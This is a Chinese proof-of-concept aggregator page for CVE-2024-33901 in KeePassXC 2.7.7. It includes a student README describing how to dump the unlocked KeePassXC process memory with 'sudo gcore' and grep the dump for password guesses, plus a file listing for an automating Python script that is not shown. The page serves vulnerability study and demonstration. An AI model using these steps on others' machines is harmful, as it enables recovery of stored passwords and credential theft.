POC详情: cf999209d27a1a7ae0016b8c54e3fdfd6033d51c

来源
关联漏洞
标题: KeePass 安全漏洞 (CVE-2024-33901)
描述:KeePass是一款开源的密码管理器。 KeePassXC 2.7.7版本存在安全漏洞,该漏洞源于允许攻击者恢复 .kdbx 数据库中存储的一些密码。
描述
Short program that demonstrates the vulnerability CVE-2024-33901 in KeePassXC version 2.7.7
介绍
# CVE-2024-33901-ProofOfConcept
Short program that demonstrates the vulnerability CVE-2024-33901 in KeePassXC version 2.7.7

The report for the class might need the source code linked, so that's why I created the repo for this

## How to replicate the vulnerability
1. Open KeePassXC and authenticate the database
2. While the database is authenticated, create a memory dump file for it

  This can be achieved by getting the PID, which can be done with this command:
  
    ps aux | grep keepassxc
  
  And then running this command: sudo gcore -o keepassxc_dump PID_HERE
  
  For example, if the PID that you got was 1234, then the command would have to be:
  
    sudo gcore -o keepassxc_dump 1234
  
3. Finally, you can run this command: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

  So if the PID was 1234, the command would be:

     cat keepassxc_dump.1234 | strings | grep "password guess here"

Once the memory dump file is created, the attack can be performed even if the database is locked again or if KeePassXC is closed.

The provided Python code performs all of these steps, and it attempts multiple password guesses based on the text files provided.
文件快照

[4.0K] /data/pocs/cf999209d27a1a7ae0016b8c54e3fdfd6033d51c ├── [ 81K] CommonPasswords.txt ├── [6.4K] keepassxc_exploit.py ├── [1.2K] README.md └── [ 34] TestPasswords.txt 0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。